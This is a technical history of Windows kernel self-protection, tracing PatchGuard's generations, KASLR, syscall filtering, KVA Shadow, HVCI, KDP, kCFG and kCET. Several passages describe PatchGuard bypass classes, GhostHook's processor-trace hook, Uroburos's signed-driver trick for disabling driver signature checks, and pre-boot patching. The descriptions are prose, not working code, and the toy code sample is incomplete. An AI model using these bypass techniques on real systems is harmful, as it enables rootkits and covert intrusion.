flowchart TD A[Timer fires at random interval] --> B[DPC routine dispatched] B --> C[Decrypt scattered context fragment] C --> D[Hash protected structures] D --> E{Hash matches expected} E -- yes --> F[Reschedule next check] E -- no --> G[Call KeBugCheckEx 0x109] G --> H[System bug-check CRITICAL_STRUCTURE_CORRUPTION] F --> A

In December 2005, eight months after PatchGuard shipped, Skywing and skape published "Bypassing PatchGuard on Windows x64" in Uninformed Volume 3 [@uninformed-v3-archive]. The paper enumerated four architectural bypass classes that would, with minor variations, survive every PatchGuard generation Microsoft has shipped since:

Patch the verifier timer. If you control the DPC queue, you can prevent the check from ever firing.
Hook the verification callback. Replace the function pointer the DPC routine is dispatched through.
Replace the DPC routine. Rewrite the bytes of nt!KiPatchGuardCheckRoutine itself, before it executes.
Swallow the bug-check. Hook KeBugCheckEx so that the eventual mismatch call returns to the attacker's handler instead of crashing the system.

The KiInitializePatchGuard initialization routine itself uses the "scattered initialization" tradition Microsoft inherited from Windows 2000 -- the context block is not allocated as a single contiguous structure but assembled from fragments at randomized offsets, each XOR-keyed against a derived value the verifier alone reconstructs at check time. The fragments are referenced through call-graph paths designed to be inaccessible to a static reader. This is exactly the engineering cost layer that Skywing's 2005 paper would later identify as raising the cost of bypass without affecting any structural bypass class.

The thesis the Uninformed paper stated in its abstract was the framing Microsoft would not formally adopt in writing for another twelve years: any defense at the same privilege as the attacker can be subverted in principle, because the attacker can do anything the defense can do -- including reading the obfuscation key and rewriting the check. The argument is structural, not empirical. Skywing's contribution was not "we broke PatchGuard"; it was "PatchGuard's class of defense has a fixed structural ceiling, and the ceiling is below 'security boundary.'"

The biographical pattern that ran through this story is unusual and worth naming explicitly. Skape (Matt Miller) later joined Microsoft and became the lead on multiple mitigation features. Skywing (Ken Johnson) later wrote the bylined MSRC blog post that introduced KVA Shadow in 2018 [@ms-kva-shadow-blog]. Andrea Allievi, who reverse-engineered PatchGuard 8.1 at NoSuchCon 2014 [@allievi-nsc2014], later co-authored *Windows Internals 7e Part 2* and the 2020 KDP launch blog [@ms-kdp-blog]. The pattern is not random: the offensive-research community that proved the same-privilege paradox was the same community Microsoft eventually hired to design the cross-privilege answer.

Microsoft did exactly what you would expect a serious engineering organisation to do when an obfuscation layer is partially peeled back: they added another. PatchGuard v2 shipped in 2006 servicing updates and was inherited by Vista x64 in November 2006. It introduced an XOR-encrypted-and-scattered context, decoy DPC routines, a generalised anti-hook framework that flagged modifications to additional kernel function tables, and randomized timer phase. In January 2007 Skywing published "Subverting PatchGuard Version 2" in Uninformed Volume 6, walking through the v2 hardening in detail and demonstrating that the same four bypass classes survived [@uninformed-v6-archive]. The engineering cost was raised; the structural ceiling was not.

It is worth seeing the integrity check as a teaching primitive. The real implementation is hardened with anti-disassembly and anti-debugging tricks that we will not reproduce; the underlying control loop is plain.

{` // Conceptual demonstration only -- the real PatchGuard is far more obfuscated const protectedStructures = { SSDT: 'eb2f4c1abe007f29d6c910a9c66e0b21', IDT: '7c4b48a39b22d5f0a1e4ecb0d80b1c2a', GDT: '0d1f3a72b9aa6d8a14e88f9d22cc66ab', KeBugCheckEx: '6677aabbccdd0011223344556677ff88', }; const expected = {...protectedStructures};

function hashStructure(name) { // In real KPP this is a derived hash over current memory contents return protectedStructures[name]; }

// Simulate one tick of the verifier patchguardCheck();

// Simulate an attacker modifying SSDT protectedStructures.SSDT = 'ffffffffffffffffffffffffffffffff'; patchguardCheck(); `}

The toy is honest about the shape: a verifier walks a fixed list, computes a hash, compares against a stored expected value, calls a bug-check on mismatch. Everything Skywing's bypass classes targeted -- the verifier's schedule, the verifier's code, the expected-hash store, the bug-check primitive -- is sitting in the address space the attacker also writes.

By January 2007, the pattern was set. Microsoft adds an obfuscation layer; Skywing peels it back; Microsoft adds another. Both sides were right. Microsoft was right that the engineering cost mattered: the AV-vendor hooking pattern was being industrially ended, signed third-party kernel drivers were a much narrower entry point than the old free-for-all, and casual rootkit authors were locked out of the bypass class. Skywing was right that engineering cost is not a security boundary. The next decade would prove both.

4. The evolution, generation by generation (2008 -- 2016)

Twelve years of cat-and-mouse ran on two parallel tracks. PatchGuard added DPC-based checks in v3 (Vista SP1 / Server 2008, February 2008) [@uninformed-v8-archive], HAL function-table verification and stack-context randomisation in Windows 7 -- 8 (2009 -- 2012), and a context-block ring in Windows 8.1 (2013) -- which Andrea Allievi reverse-engineered at NoSuchCon 2014, again finding four independent bypass paths [@allievi-nsc2014]. Meanwhile, two quieter developments laid the groundwork for what was coming: KASLR shipped on Vista x64 in 2007 [@russinovich-vista-part3], and Jurczyk and Coldwind's Bochspwn project in 2013 falsified the industry's assumption that win32k LPE bugs were a tail of accidents [@j00ru-bochspwn-blog].

The PatchGuard generation ladder

Each generation tightened the engineering cost without changing the structural ceiling. The table below summarises the evolution; the right-most column lists the canonical reverse-engineering primary, which in every generation came from outside Microsoft.

Generation	Year, OS first shipped	Key delta	Canonical reverse-engineering primary
v1	April 2005, XP x64 / Server 2003 SP1 x64	Baseline -- single context block, fixed protected-structure list, single DPC	Skywing & skape, Uninformed v3, Dec 2005 [@uninformed-v3-archive]
v2	2006 servicing, inherited by Vista x64 Nov 2006	XOR-encrypted scattered context, decoy DPCs, anti-hook framework	Skywing, Uninformed v6, Jan 2007 [@uninformed-v6-archive]
v3	Vista SP1 / Server 2008, Feb 2008	Multiple concurrent contexts, randomised timer phase, `KeBugCheckEx` self-protection	Skywing, Uninformed v8, Sep 2007 [@uninformed-v8-archive]
v7 (Windows 7)	2009 -- 2010	HAL function-table verification, stack-context randomisation	Community RE; no single canonical paper
v8 (Windows 8)	2012	`KeServiceDescriptorTableShadow` added (now covers win32k syscall table), expanded MSR list	Community RE
v8.1	2013 (Windows 8.1)	Single context block replaced by context-block ring; atomic patching of every block required; 247 protected structures (vs ~26 on Vista x64)	Andrea Allievi, NoSuchCon 2014 [@allievi-nsc2014]

Allievi's 2014 talk is the clearest single picture of what hardening looked like by the Windows 8.1 era. The single context block had become a singly-linked list (SLIST) of context blocks. The cryptographic self-integrity check now ran across the SLIST. The protected-structure set had grown from roughly twenty-six on Vista x64 to two hundred and forty-seven by Windows 8.1, including HalPrivateDispatchTable and HalpInterruptController [@allievi-nsc2014]. And the four 2006 bypass classes still worked. The engineering cost of bypassing PatchGuard had risen by an order of magnitude; the architectural class of bypass had not changed.

KASLR on Vista, February -- April 2007

In parallel with the PatchGuard generation ladder, Microsoft shipped a different style of defense on the same kernel. Mark Russinovich's three-part Inside the Windows Vista Kernel series in TechNet Magazine documented the new mitigation in April 2007 [@russinovich-vista-part3]: the kernel image base, instead of being constant, was selected at boot from a small space of possible offsets.

Randomising the kernel image base across boots, so that an attacker with a stale or guessed kernel address cannot use it as an absolute reference. On Vista x64 the implementation had roughly eight bits of entropy (256 possible kernel base addresses), selected at boot time by `winload.exe` [@russinovich-vista-part3]. The mitigation is *probabilistic* by construction: it raises the cost of an unprivileged information-leak, but cannot survive a deterministic side-channel attacker.

The Vista bootloader, winload.exe, was the component that picked the kernel image base at boot. The choice of selecting the offset early -- before the kernel proper executes -- was deliberate; KASLR after the kernel is mapped is harder to do because every kernel pointer recorded so far becomes invalid. The Vista bootloader was also the component PatchGuard's protected list depended on: an attacker with bootloader code execution simply chose their own offset.

The probabilistic framing held until 2013. Hund, Willems, and Holz published "Practical Timing Side Channel Attacks Against Kernel Space ASLR" at IEEE S&P 2013 [@doi-hund-2013]. Their technique exploited the shared TLB and cache state between user mode and kernel mode on every x86 / x64 CPU then shipping: an unprivileged user-mode timer could measure differential cache behaviour when accessing addresses near where the kernel mapped its image, and recover the kernel base in seconds. Eight bits of entropy collapse fast under a side-channel that gives you one bit per probe. Gruss et al. generalised the argument in 2017 with a paper whose title was the thesis: "KASLR is Dead: Long Live KASLR" [@gruss-kaiser-pdf]. The structural answer would have to be something other than entropy.

The 2012 Windows 8 attempt at attack-surface deletion

While KASLR's structural limits were being demonstrated in academia, Microsoft shipped a different style of mitigation in Windows 8: DisallowWin32kSystemCalls, a process-level option enabling the kernel to refuse every win32k system call from a process that opted in [@ms-syscall-disable-policy]. The semantics are all-or-nothing: a process either can call into win32k.sys or it cannot. Useful for non-UI broker processes (where the answer is "never"). Structurally inadequate for browser renderers, which need to draw windows, render fonts, and dispatch input through a constrained-but-non-empty subset of the win32k surface. The mitigation languished for five years, waiting for the per-syscall version that arrived in 2017.

The Bochspwn empirical surprise

In 2013, Mateusz Jurczyk and Gynvael Coldwind presented Bochspwn at SyScan and at Black Hat USA [@j00ru-bochspwn-blog] [@j00ru-bhusa-pdf]. The methodology was a Bochs x86 emulator instrumented to trace every memory access made by the kernel during syscall handling. The instrumentation found classes of bugs -- specifically double-fetch bugs, where the kernel reads the same user-controlled memory twice without re-validating between reads -- by tagging each user-pointer dereference and looking for repeats.

A double-fetch happens when kernel code reads a value from user-mode memory, validates it, and later reads the *same* address again expecting the value to be unchanged. A racing user-mode thread can flip the value between the two reads, defeating the validation. Detecting double-fetches statically is hard; detecting them by static analysis on a closed-source kernel is harder still. Bochspwn solved the detection problem at the emulator level: instrument the entire kernel under Bochs, log every memory read of every page table mapped writable from user mode, and post-process the trace for "same address, same kernel function, two reads, no intervening synchronisation." The result: dozens of exploitable kernel race conditions across multiple Windows versions, the *majority* in `win32k.sys` [@j00ru-bochspwn-blog]. The win32k bug class was systemic, not accidental.

Jurczyk's empirical finding mattered because it pre-dated the design of the eventual lockdown by four years. The community knew, by mid-2013, that win32k.sys was a bug class, not a bug tail. Microsoft's eventual answer -- per-process filtering of the win32k syscall surface -- had a clean empirical motivation by the time it shipped.

The pre-Bochspwn high-profile example was already in the literature: Bruce Dang and Peter Ferrie's December 2010 talk at the 27th Chaos Communication Congress ("Adventures in Analyzing Stuxnet") had named CVE-2010-2743, a win32k.sys NtUserLoadKeyboardLayoutEx LPE that Stuxnet used to escalate from user to kernel on Windows XP [@nvd-cve-2010-2743]. Stuxnet placed one of the most consequential kernel-level malware operations on record on top of a single win32k vulnerability. Bochspwn explained why: the surface was structurally vulnerable, not accidentally so.

The intellectual surprise of this act -- Uroburos coexisted with PatchGuard

The cleanest demonstration that the same-privilege paradox is empirical, not theoretical, came in February 2014. G Data SecurityLabs published its analysis of Uroburos, a Russian-attributed espionage rootkit that had been operating in production for an estimated three years [@gdata-uroburos-blog]. Uroburos did not bypass PatchGuard. It loaded a copy of Oracle's VBoxDrv.sys (a signed third-party driver shipped as part of VirtualBox), used a privilege-escalation vulnerability in that driver to flip the g_CiEnabled flag (the gate for Driver Signature Enforcement), loaded its own unsigned rootkit driver, and then operated for three years in production without ever modifying anything PatchGuard checked [@stmxcsr-turla].

Note: The most-repeated misreading of PatchGuard's track record is "Uroburos was a PatchGuard bypass." It was not. Uroburos was a Driver Signature Enforcement (DSE) bypass that operated alongside PatchGuard for three years (2011 -- 2014) without modifying any PatchGuard-protected structure [@gdata-uroburos-blog] [@stmxcsr-turla]. The lesson is structural: PatchGuard's protected-structure list is, by construction, narrower than the kernel-modification surface, and a disciplined attacker simply stays outside the list. The corollary -- that no in-kernel integrity monitor can be wider than its protected-structure list, and any list narrower than "all kernel memory" leaves gaps -- is the empirical anchor for the same-privilege paradox.

The policy on 64-bit Windows that the kernel will load only Authenticode-signed drivers in production. DSE is gated by an in-memory flag (`nt!g_CiEnabled` historically, `nt!g_CiOptions` on later builds). An attacker with arbitrary kernel write can flip the flag and load unsigned drivers -- which is precisely how the BYOVD attack pattern works [@gdata-uroburos-blog] [@hfiref0x-upgdsed].

Three insights converged from this act. From the side-channel KASLR literature: some defenses cannot succeed at CPL=0 because the attack is below the operating system. From Allievi 2014 and Uroburos 2011 -- 2014: same-privilege obfuscation is permanently bounded by engineering cost, no matter how much engineering cost you pay. From Bochspwn: win32k is not a bug tail but a bug class -- the only structural answer is to delete the surface rather than defend it. The 2017 calendar year was about to land all three answers at once.

5. 2017's triple inflection

In a single calendar year, three mutually independent breakthroughs reshaped kernel self-defense. June 2017: CyberArk's Kasif Dekel published GhostHook, an Intel-PT-based PatchGuard bypass that forced Microsoft's first public statement that PatchGuard is not a security boundary [@cyberark-ghosthook]. July 2017: Gruss et al. published "KASLR is Dead: Long Live KASLR" at ESSoS, proposing kernel page-table isolation as the structural answer [@gruss-kaiser-pdf]. October 2017: Windows 10 1709 shipped Win32kSystemCallFilter, the per-process, per-syscall allow-list designed for the Chrome and Edge renderer sandboxes [@ms-syscall-filter-policy]. Three teams, three mitigations, three facets of the same paradox.

Win32kSystemCallFilter (October 17, 2017)

The Windows 8 mitigation DisallowWin32kSystemCalls had been the right idea applied as a meat-axe: an opted-in process loses access to every win32k system call. Windows 10 1709 introduced the surgical version. PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY registers a per-process bitmap of system-defined FilterId values that the process is allowed to call; everything outside the bitmap is denied [@ms-syscall-filter-policy]. The filter is applied via UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, ...) at CreateProcess time -- not at runtime.

A Windows 10 1709+ process-mitigation policy (`PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY`, header `ntddk.h`) that registers a per-process bitmap of allowed system-defined `FilterId` values for win32k system calls. Calls outside the bitmap terminate the calling process. Used by the Chromium sandbox to constrain the win32k surface available to a renderer process [@ms-syscall-filter-policy] [@chromium-sandbox-doc].

The "at CreateProcess time, not at runtime" detail is load-bearing. James Forshaw and Ivan Fratric's November 2016 Project Zero post "Breaking the Chain" documented how Edge's window-broker architecture, which applied syscall restrictions to a child process after it had started, was subject to a window-of-opportunity race between the child's earliest syscall and the broker's policy application [@pz-breaking-chain]. If the policy is not in place by the time the first attacker-controlled syscall fires, the policy has not happened. The lesson the Windows 10 1709 design banked: mitigations belong on the CreateProcess boundary, not on a later thread.

sequenceDiagram participant R as Renderer process (VTL0 user) participant SD as Syscall dispatcher (kernel) participant W as win32k handler participant EP as EPROCESS filter bitmap R->>SD: NtUser/NtGdi syscall with FilterId N SD->>EP: Consult per-process filter bitmap EP-->>SD: bit N set or unset alt FilterId allowed SD->>W: Dispatch to win32k handler W-->>R: Return result else FilterId denied SD->>R: Terminate process via fast-fail end

The Forshaw / Fratric Edge race is a textbook case of why "apply at runtime" is a security anti-pattern for process mitigations. The Microsoft Edge of late 2016 used a sandbox model in which a renderer process started with limited restrictions and then upgraded itself to the full lockdown profile after initialisation. Forshaw and Fratric showed that an attacker who landed code execution before the upgrade completed -- a window of milliseconds -- could simply not upgrade. The lesson generalises beyond Edge: every per-process mitigation in modern Windows is applied at process creation time precisely so there is no window the attacker can race [@pz-breaking-chain].

The cleanest way to see the two-mitigation contrast is side by side:

Property	`DisallowWin32kSystemCalls`	`Win32kSystemCallFilter`	Chromium's actual choice
First shipped	Windows 8, 2012 [@ms-syscall-disable-policy]	Windows 10 1709, October 2017 [@ms-syscall-filter-policy]	Both, in different process types
Granularity	All-or-nothing	Per-syscall allow-list	Blanket-disable for non-UI; per-syscall for renderer
Mitigation policy struct	`PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY`	`PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY`	Composes both with LPAC privilege reduction
Use case	Non-UI broker processes (GPU broker, network process)	Renderer processes that draw windows	The renderer needs a constrained-but-non-zero win32k subset [@chromium-sandbox-doc]

The Chromium sandbox composes the two mitigations with one more: the Less Privileged AppContainer (LPAC). LPAC removes ambient access to user data, the network, and most named-object namespaces; Win32kSystemCallFilter removes the syscall surface; DisallowWin32kSystemCalls applies to processes that need no UI at all. Defense in depth at the surface level rather than the structural level.

A Windows AppContainer variant introduced in Windows 10 that further restricts the ambient capabilities available to the contained process -- no access to user files, no access to most named objects, restricted ability to enumerate the system. Combined with `Win32kSystemCallFilter`, LPAC gives the Chromium renderer a process model in which both *what the renderer can ask the kernel to do* and *what the renderer can see in user mode* are deliberately narrow [@chromium-sandbox-doc].

Note: Win32kSystemCallFilter is the first mitigation in the 21-year arc that deletes attack surface rather than defending it. PatchGuard and KASLR are kernel defenses: they live inside the kernel and protect kernel state. The win32k filter is a process-mitigation policy enforced by the kernel's system-call dispatcher at the syscall boundary. The protection is realised by not letting the kernel be called rather than by checking the kernel's state afterwards. Once you see this shape, the rest of the modern Windows mitigation stack -- KDP, kCFG-with-VBS-bitmap, kCET -- becomes legible as variations on the same move: put the enforcement outside the attacker's reach.

KAISER and the page-table split

In July 2017, Gruss et al. presented "KASLR is Dead: Long Live KASLR" at ESSoS [@gruss-kaiser-pdf]. The acronym was KAISER -- Kernel Address Isolation to have Side-channels Efficiently Removed. The architecture is simple to describe, hard to engineer, and devastating to a side-channel attacker.

A modern x64 kernel runs in the same virtual address space as the calling user process, distinguished by privilege bits in page-table entries. A syscall does not change the page tables; it only changes the privilege level. The TLB is therefore shared between user and kernel mappings, and side-channel attacks like Hund 2013 work by timing the resulting cache and TLB behaviour. KAISER's answer was to give each process two sets of page tables: a "user" CR3 in which the kernel address space is not mapped, and a "kernel" CR3 in which the full virtual address space is mapped. The syscall entry path switches from user CR3 to kernel CR3; the sysret path switches back. The kernel address space is not just unknown to a user-mode attacker -- it is structurally unreachable.

A design proposed by Gruss et al. (KAISER, ESSoS 2017) [@gruss-kaiser-pdf] in which each process has two page-table hierarchies: a user CR3 that does not map the kernel and a kernel CR3 that maps both. CR3 is switched on every syscall entry and exit. The kernel is no longer just *hard to find* (the KASLR posture); it is *unreachable* from user CR3 (the structural posture). Linux shipped KAISER as KPTI in early 2018; Microsoft shipped a re-engineered variant as KVA Shadow [@ms-kva-shadow-blog]. sequenceDiagram participant U as User-mode thread participant CPU as CPU CR3 participant K as Kernel U->>CPU: syscall (SYSCALL instruction) CPU->>CPU: Switch CR3 from user to kernel CPU->>K: Kernel now mapped, enter system service K->>K: Handle request K->>CPU: SYSRET CPU->>CPU: Switch CR3 back to user CPU->>U: Return to user mode, kernel unmapped

The Gruss paper landed six months before anyone knew why it mattered. Then, on January 3, 2018, Jann Horn published "Reading privileged memory with a side-channel" on Project Zero [@pz-meltdown-post], the same day the academic teams (Lipp et al., independently) published the Meltdown disclosure [@usenix-lipp-meltdown]. Meltdown -- CVE-2017-5754, "rogue data cache load" -- exploited transient out-of-order execution on Intel CPUs to read kernel memory from user mode. The only structural fix was to ensure the kernel pages were not present in the user-mode page table. KAISER's design, drafted as a generic side-channel countermeasure, was suddenly Meltdown's required mitigation.

GhostHook and the formal admission

In June 2017, Kasif Dekel published GhostHook [@cyberark-ghosthook]. The mechanism is elegant. Intel Processor Trace (Intel PT) is a CPU feature for low-overhead recording of control flow, designed for performance analysis and debugging. The trace is written to a Table of Physical Addresses (ToPA), and when a configured ToPA region fills, the CPU raises a performance-monitoring interrupt (PMI). The OS's PMI handler is a function pointer. PMI handlers run in kernel mode, with full kernel privilege. GhostHook configured Intel PT with a tiny ToPA covering an address near IA32_LSTAR (the syscall entry MSR), arranged for the buffer to fill immediately, and registered an attacker-controlled PMI handler. Every kernel transition fired the PMI; the attacker's handler ran first. PatchGuard does not enumerate Intel PT. By design.

Microsoft's response, as reported in the CyberArk write-up, was the formal end of an eleven-year ambiguity. PatchGuard is "considered an in-depth security feature" but not a security boundary; the GhostHook bypass would "be considered for a future version of Windows" but did not warrant an out-of-band fix [@cyberark-ghosthook]. The Microsoft position aligns with the Security Servicing Criteria: admin-to-kernel is not a security boundary, and an attacker who has already reached kernel mode (the precondition for installing a GhostHook-style PMI handler) is outside the scope of what PatchGuard exists to prevent [@ms-servicing-criteria].

While the technique was found to bypass PatchGuard, Microsoft has graciously agreed to consider [the issue] for a future version of Windows. As such, no immediate risk exists for customers. -- Microsoft response to GhostHook, June 2017 [@cyberark-ghosthook].

The three breakthroughs of 2017 were structurally aligned. Win32kSystemCallFilter deleted the most-vulnerable syscall surface from sandboxed renderers. KAISER's page-table split made KASLR's probabilistic defense obsolete and structurally unreachable. GhostHook forced the public admission that the same-privilege class of defense has a ceiling Microsoft already knew about. And then, on the morning of January 3, 2018, the academic paper of six months earlier became an emergency engineering deliverable.

6. State of the art: KDP, KVA Shadow, kCFG, kCET, and the Secure Kernel shift (2018 -- 2026)

January 3, 2018: Meltdown's public disclosure forces every major operating system to ship page-table isolation within weeks [@pz-meltdown-post]. Microsoft's response, KVA Shadow, ships in the Windows 10 1709 cumulative security update the same day. The engineering write-up is bylined to Ken Johnson of the Microsoft Security Response Center [@ms-kva-shadow-blog]. The same Ken Johnson who, twelve years earlier, co-authored Bypassing PatchGuard on Windows x64 under the name Skywing [@uninformed-v3-archive]. The offensive-research outsider had become the bylined Microsoft defender. The same loop was about to close on the architectural question: where, exactly, does the defense live?

The Ken Johnson / Skywing trajectory -- offensive Uninformed paper in 2005, the bylined MSRC blog post in 2018, twelve years later -- is the cleanest single illustration of the offensive-research-to-Microsoft pattern. He is engineering credit attributed to Ken Johnson on the MSRC byline; the offensive identity is widely known but not asserted by Microsoft. Either reading of the byline is valid; the structural point is that the same person whose 2005 paper identified the architectural ceiling of CPL=0 obfuscation later shipped the cross-privilege answer for Meltdown [@uninformed-v3-archive] [@ms-kva-shadow-blog].

KVA Shadow: the productisation of KAISER

KVA Shadow is the Windows productisation of KAISER. Two CR3-loadable page tables per process: a user-mode shadow that does not map most of the kernel, and a kernel-mode page table that does. CR3 is switched on every syscall entry and exit. The kernel address space is unmapped from user CR3 [@ms-kva-shadow-blog]. The structural Meltdown fix is exact: a Meltdown-class transient read of a kernel address from user mode now hits an unmapped page-table entry and raises a fault before any cached side-channel evidence is produced.

Two things to be precise about. First, KVA Shadow addresses Variant 3 (Meltdown, CVE-2017-5754) only. Spectre Variant 1 (CVE-2017-5753), Variant 2 (CVE-2017-5715), and Variant 4 (Speculative Store Bypass) require their own mitigations (microcode updates, retpoline, IBRS / IBPB, SSBD); KVA Shadow does nothing for them [@usenix-lipp-meltdown]. Second, the performance cost of the CR3-switch on every syscall is real -- Fortinet's analysis of the KVA Shadow build measured significant slowdowns for syscall-heavy workloads, mitigated on newer CPUs by Process-Context Identifiers (PCID) that keep TLB entries valid across CR3 switches [@fortinet-kva-shadow].

HVCI: the VTL1 enabler

Hypervisor-Protected Code Integrity (HVCI) is not, strictly, a kernel defense -- it is the foundation everything else in the modern stack stands on. HVCI uses Virtualization-Based Security (VBS) to run a small Secure Kernel in Virtual Trust Level 1 (VTL1), one privilege level above the NT kernel in VTL0. The Secure Kernel manages the Second-Level Address Translation (SLAT) page tables -- Intel EPT or AMD NPT -- that mediate physical memory access for the NT kernel. With HVCI on, kernel pages are managed W^X (writable XOR executable): a kernel-mode driver attempting to make a writable page executable triggers a SLAT fault that VTL1 catches.

A Windows architecture in which the hypervisor partitions the system into two Virtual Trust Levels. VTL0 hosts the normal NT kernel, drivers, and user-mode processes. VTL1 hosts a Secure Kernel and a small set of trustlets that enforce policy on VTL0. Cross-VTL transitions are mediated by the hypervisor; a VTL0 kernel-mode attacker cannot reach VTL1, even with arbitrary kernel write. VBS is the architectural primitive that makes HVCI, KDP, and kCFG-with-VBS-bitmap possible [@ms-kdp-blog].

For this article HVCI is the cross-cutting dependency: it is what makes KDP and the VBS-protected kCFG bitmap work. Once you have a hypervisor enforcing SLAT on the NT kernel, every defense you want to anchor outside the NT kernel has a home.

KDP: static and dynamic kernel data protection

Microsoft announced Kernel Data Protection on July 8, 2020, with Windows 10 version 2004 [@ms-kdp-blog]. Two flavours.

Static KDP uses the MmProtectDriverSection API, called from DriverEntry, to mark a section of the driver's image as read-only for the rest of the kernel's lifetime. The intended use is for tables of policy data the driver expects never to modify after initialisation: function-pointer arrays, configuration constants, signed policy blobs. Once MmProtectDriverSection returns, the section's pages are tagged read-only in the VTL1-managed SLAT; a VTL0 kernel-mode attempt to write them takes a hardware page fault that VTL0 has no way to relax.

Dynamic KDP is for runtime-allocated state. The canonical API is ExAllocatePool3, called with a POOL_EXTENDED_PARAMETER array containing a POOL_EXTENDED_PARAMS_SECURE_POOL extended parameter [@ms-kdp-blog]. The flags SECURE_POOL_FLAGS_FREEABLE (1) and SECURE_POOL_FLAG_MODIFIABLE (2) control whether the allocation can later be freed and whether further protected modifications are permitted. The secure-pool extension routes the allocation through the Secure Kernel; the resulting memory is verified by VTL1 and protected by SLAT.

Note: KDP does not automatically protect "all kernel memory." It protects exactly the memory a driver author opts in to protect via MmProtectDriverSection (static) or ExAllocatePool3 with the secure-pool extension (dynamic) [@ms-kdp-blog]. Memory allocated through the normal ExAllocatePool2 path is not KDP-protected. A defender architecting around KDP must explicitly opt the data they care about into the secure pool; the protection is targeted, not blanket.

A Microsoft kernel-memory protection introduced with Windows 10 version 2004 (July 2020) that allows drivers to mark sections of kernel memory as read-only and have the protection enforced by the Secure Kernel in VTL1 via the SLAT page tables. Static KDP uses `MmProtectDriverSection`; Dynamic KDP uses `ExAllocatePool3` with a `POOL_EXTENDED_PARAMS_SECURE_POOL` extended parameter passed via `POOL_EXTENDED_PARAMETER`. The enforcement lives at a privilege level the VTL0 attacker cannot reach [@ms-kdp-blog].

The Microsoft launch blog makes the architectural point in one sentence: "the memory managed by KDP is always verified by the secure kernel (VTL1) and protected using SLAT tables by the hypervisor" [@ms-kdp-blog]. This is the first kernel self-defense mitigation in the Windows lineage whose enforcement is structurally outside the NT kernel. A VTL0 attacker with arbitrary kernel write cannot relax the SLAT entry that protects a KDP-tagged page, because the SLAT entry is managed by VTL1, and VTL1 is not in VTL0's address space.

flowchart TD A[VTL0 NT kernel plus attacker driver] -->|attempt write to KDP-protected page| B[CPU memory access] B --> C[SLAT page table consulted] C --> D{SLAT entry writable for VTL0} D -- no, RO by VTL1 --> E[Hardware EPT or NPT fault] D -- yes --> F[Write succeeds] E --> G[Secure Kernel in VTL1 receives fault] G --> H[VTL0 attacker has no path to relax SLAT entry]

Note: The canonical pre-boot PatchGuard bypass, EfiGuard, is a UEFI bootkit that patches the loaded kernel image to disable PatchGuard and DSE before the kernel runs [@mattiwatti-efiguard]. It works precisely because PatchGuard, DSE, and the kernel image all live in VTL0 -- a pre-boot agent has the same architectural reach. But once the system boots into a VBS-enabled configuration, the SLAT enforcement lives in VTL1, and the launching firmware does not have VTL1's privileges. The same attacker that defeats PatchGuard at the kernel level cannot defeat HVCI from the same vantage. This is the cleanest cross-mitigation demonstration that the architectural-layer choice -- "which privilege level does the defense live at?" -- is the load-bearing variable.

kCFG: forward-edge integrity

Control Flow Guard (CFG) is Microsoft's compiler-assisted forward-edge CFI. Every indirect call is replaced by a check against a bitmap of valid call targets; an invalid target raises a fast-fail [@ms-cfg]. The kernel variant -- kCFG -- is enabled by /guard:cf and protects indirect calls in ntoskrnl and CFG-compiled drivers. With HVCI on, the CFG bitmap is stored in VTL1-protected memory; a VTL0 attacker who can write arbitrary kernel pages still cannot tamper with the bitmap. kCFG defeats jump-oriented and call-oriented programming (JOP / COP) against the forward edge. It does nothing for the backward edge.

kCET: backward-edge integrity in hardware

Kernel-mode hardware-enforced stack protection (informally kCET, formally documented as "Kernel Mode Hardware-enforced Stack Protection") closes the backward edge using the Intel CET and AMD Shadow Stack hardware features [@ms-kernel-mode-hsp]. A CPU-maintained shadow stack records every CALL return address; every RET validates the popped address against the shadow stack and fast-fails on mismatch. The shadow-stack pages are marked Shadow Stack in the kernel-mode PTE, which the CPU enforces directly; with VBS on, the Secure Kernel additionally locks the shadow-stack mappings against VTL0 write.

kCET requires Intel 11th-generation Tiger Lake or later, or AMD Zen 3 or later, plus VBS and HVCI [@ms-kernel-mode-hsp]. It is off-by-default on Windows Server 2025 because enabling it system-wide requires every loaded driver to be compiled with the /CETCOMPAT flag; a single non-/CETCOMPAT driver disables kCET for the entire system at load time. As of June 2026, the rollout is gated on driver vendor adoption.

An adjacent technique worth knowing about by name is eXtended Flow Guard (XFG). XFG augmented kCFG's bitmap-membership check with a per-function type-derived 64-bit hash compared at the call site -- a defense that detects not just "is this target valid?" but "is this target the right target for this call's signature?" XFG was prototyped in MSVC and partially shipped on Windows 10 Insider builds, but the instrumentation never reached full inbox-kernel coverage and the feature is no longer Microsoft's strategic investment direction. The shipping equivalent on 2026 hardware is kCET for the backward edge plus kCFG for the forward edge.

Connor McGarr's Black Hat USA 2025 deck, "Out of Control: KCFG and KCET," documents the 2026 frontier of kCET bypasses -- an iretq-frame corruption combined with a write-what-where primitive can pivot around the shadow stack [@mcgarr-bh25-blackhat] [@mcgarr-km-shadow] [@mcgarr-github]. The bypass requires the attacker to already control a kernel-mode write primitive and several CFG-clean targets, which is exactly the precondition KDP, kCFG, and HVCI are designed to make hard.

ARM64 Pointer Authentication

The recurring framing of PatchGuard as "x64-only" is documentation-accurate but deployment-incomplete. In 2026, PatchGuard, kCFG, and Pointer Authentication Codes (PAC) ship on 64-bit ARM Windows as well as x64. PAC is an ARMv8.3-A feature in which a tag computed over a pointer value and a per-process key is stored in the unused high bits of the pointer; the CPU validates the tag on dereference. PAC closes a different class of pointer-corruption attacks than kCFG/kCET. The structural point is that the kernel self-defense investment is fully cross-architecture, not x64-only.

The Microsoft Vulnerable Driver Blocklist

The reactive answer to BYOVD is the Microsoft Recommended Driver Block Rules -- a list of known-vulnerable signed third-party drivers that Windows refuses to load when App Control for Business (formerly WDAC) is enabled [@ms-driver-block-rules]. The list is default-on with Memory Integrity, Smart App Control, and S-mode since Windows 11 22H2 and is updated through Windows Update. Verification on a modern system: CiTool --list-policies and look for a policy whose friendly name is Microsoft Windows Driver Policy and Is Currently Enforced: true. The blocklist is the structural answer to the Uroburos pattern -- Microsoft cannot prevent any signed third-party driver from having a write-primitive bug, but they can refuse to load specific drivers known to have shipped such bugs.

